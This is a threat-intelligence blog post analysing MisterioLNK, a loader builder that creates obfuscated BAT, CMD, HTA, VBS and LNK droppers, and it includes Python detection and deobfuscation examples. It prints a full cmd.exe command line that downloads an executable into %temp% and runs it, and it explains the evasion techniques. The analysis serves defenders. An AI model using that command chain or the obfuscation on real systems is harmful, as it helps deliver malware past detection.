Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.

As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while also employing obfuscation. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.

Key features of MisterioLNK include support for five loader methods (HTA, BAT, CMD, VBS, and LNK) as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.

The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.

Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, and BlankStealer. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.

For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.

Technical Details

Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.

BAT/CMD Loader and Obfuscator

The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.

The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”

HTA Loader:

The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.

VBS Loader and Obfuscator:

The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.
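The two obfuscation layers described above (the `%random%` filler inserted into BAT/CMD lines, and the `Chr()` concatenation wrapped in `Execute()` for VBS) are mechanical enough to be reversed for triage. The following Python is an added analysis example, not code from the MisterioLNK project or from Cyble; the environment-variable allow-list and the sample scripts are constructed here and are assumptions of the example.

```python
import re

# Environment variables a loader legitimately references (%temp% appears in the
# page's LNK command); every other %...% token is treated as inserted filler.
# This allow-list is an assumption of the example, not part of the tool.
KNOWN_ENV_VARS = {"temp", "tmp", "appdata", "localappdata", "userprofile"}

PERCENT_TOKEN = re.compile(r"%([^%\r\n]+)%")          # %name% in batch text
CHR_CALL = re.compile(r"Chr\((\d+)\)", re.IGNORECASE)  # Chr(n) in VBScript
EXECUTE_WRAPPER = re.compile(r"^\s*Execute\s*\((.*)\)\s*$", re.IGNORECASE | re.DOTALL)

def deobfuscate_batch(script: str) -> list[str]:
    """Strip %filler% tokens from each line, keeping known environment variables.

    Inside a running .bat/.cmd file an undefined %name% expands to nothing, which
    is why the obfuscated loader still works; dropping them recovers the command.
    """
    def keep_or_drop(m: re.Match) -> str:
        return m.group(0) if m.group(1).lower() in KNOWN_ENV_VARS else ""
    return [PERCENT_TOKEN.sub(keep_or_drop, line) for line in script.splitlines()]

def has_misterio_marker(script: str) -> bool:
    """The builder prepends a comment naming MisterioLNK: a cheap static signature."""
    lines = script.splitlines()
    low = lines[0].lstrip().lower() if lines else ""
    return low.startswith(("::", "rem ")) and "misteriolnk" in low

def deobfuscate_vbs(script: str) -> str:
    """Rebuild the string hidden in Execute(Chr(n)&Chr(n)&...) into plain VBScript."""
    m = EXECUTE_WRAPPER.match(script)
    body = m.group(1) if m else script
    return "".join(chr(int(n)) for n in CHR_CALL.findall(body))

# Constructed samples mimicking the described output; not real loader files.
SAMPLE_BAT = (
    ":: MisterioLNK\r\n"
    "c%q7f%u%z1%rl hxx%ab%ps://example.invalid/p.exe -o %temp%%x2%\\p.exe\r\n"
    "st%aa%art /b %temp%\\p%v%.exe\r\n"
)
SAMPLE_VBS = ('Execute(Chr(87)&Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(46)'
              '&Chr(69)&Chr(99)&Chr(104)&Chr(111)&Chr(32)&Chr(34)&Chr(100)&Chr(101)&Chr(99)'
              '&Chr(111)&Chr(100)&Chr(101)&Chr(100)&Chr(34))')

if __name__ == "__main__":
    print(has_misterio_marker(SAMPLE_BAT))       # True
    print("\n".join(deobfuscate_batch(SAMPLE_BAT)))
    print(deobfuscate_vbs(SAMPLE_VBS))           # WScript.Echo "decoded"
```

Because the batch layer preserves real variable references such as `%temp%`, the allow-list must be tuned to the environment variables the analyst expects; anything not on it is treated as filler.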

LNK Loader Builder:

The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:\Windows\system32\cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%\ntvy4adp.exe & start /b %temp%\ntvy4adp.exe”. The figure below shows the properties of the LNK file.
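The LNK target above is a fixed three-step chain (shrink the console window, `curl` a payload into `%temp%`, then `start /b` the same file), which is a good fit for process-creation telemetry. This Python is an added detection example, not code from Cyble or from the MisterioLNK project; the command lines it is run over are constructed here with placeholder URLs and file names.

```python
import re

# cmd.exe separators the LNK command chains with: " & " and " && ".
SEPARATOR = re.compile(r"\s&&?\s")
MODE_SHRINK = re.compile(r"\bmode\s+\d+,\d+", re.IGNORECASE)      # resizes the console window
CURL_OUT = re.compile(r"\bcurl\b.*?\s-o\s+(\S+)", re.IGNORECASE)  # curl ... -o <path>
START_BG = re.compile(r"\bstart\b(?:\s+/b)?\s+(\S+)", re.IGNORECASE)
TEMP_DIR = re.compile(r"%temp%\\", re.IGNORECASE)

def analyze_cmdline(cmdline: str) -> list[str]:
    """Return the indicators found in one cmd.exe command line, in order of appearance.

    The chain the page describes is: resize the console, curl a payload into
    %temp%, then start that same file in the background.
    """
    findings: list[str] = []
    downloaded: set[str] = set()   # paths written by curl -o so far
    for segment in SEPARATOR.split(cmdline):
        if MODE_SHRINK.search(segment):
            findings.append("console_resized")
        m = CURL_OUT.search(segment)
        if m:
            target = m.group(1).strip('"').lower()
            downloaded.add(target)
            if TEMP_DIR.search(target):
                findings.append("curl_writes_to_temp")
        m = START_BG.search(segment)
        if m and m.group(1).strip('"').lower() in downloaded:
            findings.append("downloaded_file_executed")
    return findings

def is_loader_chain(cmdline: str) -> bool:
    """True only when a file fetched by curl is executed later in the same command line."""
    return "downloaded_file_executed" in analyze_cmdline(cmdline)

# Constructed command lines (placeholder URL and file names), not captured telemetry.
LNK_STYLE = ("C:\\Windows\\system32\\cmd.exe /c mode 15,1 & curl hxxps://example.invalid/d.exe"
             " -o %temp%\\stage2.exe & start /b %temp%\\stage2.exe")
BENIGN = "C:\\Windows\\system32\\cmd.exe /c curl https://example.invalid/report -o %temp%\\report.json"

if __name__ == "__main__":
    for line in (LNK_STYLE, BENIGN):
        print(is_loader_chain(line), analyze_cmdline(line))
```

Alerting on `downloaded_file_executed` rather than on `curl` alone keeps administrative downloads to `%temp%` from firing, while the other indicators can raise the score of an alert that does fire.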

Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.

Conclusion

MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.

Our Recommendations

Implement security solutions that can recognize and detect the specific obfuscation patterns and script formats generated by MisterioLNK Builder.

Use software restriction policies or application whitelisting to limit the execution of unauthorized scripts and reduce the attack surface for loaders like MisterioLNK.

Focus on behavioral detection strategies to identify suspicious activities, like the use of scripting engines to download and execute files, regardless of obfuscation.

Educate users about the risks associated with executing files from unknown or untrusted sources, emphasizing the dangers of seemingly benign shortcut files (.lnk).

MITRE ATT&CK® Techniques

| Tactic | Technique | Procedure |
| --- | --- | --- |
| Execution (TA0002) | User Execution: Malicious File (T1204.002) | MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file. |
| Execution (TA0002) | Command and Scripting Interpreter (T1059) | Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system. |
| Execution (TA0002) | Command and Scripting Interpreter: Visual Basic (T1059.005) | Deploys obfuscated VBScript files that execute commands to download and run additional payloads. |
| Execution (TA0002) | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution. |
| Defence Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction. |
| Defence Evasion (TA0005) | Obfuscated Files or Information: Command Obfuscation (T1027.010) | MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult. |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTP/S through the curl command to communicate with remote servers to download payloads. |

Indicators Of Compromise


The post MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders appeared first on Cyble.

Blog – Cyble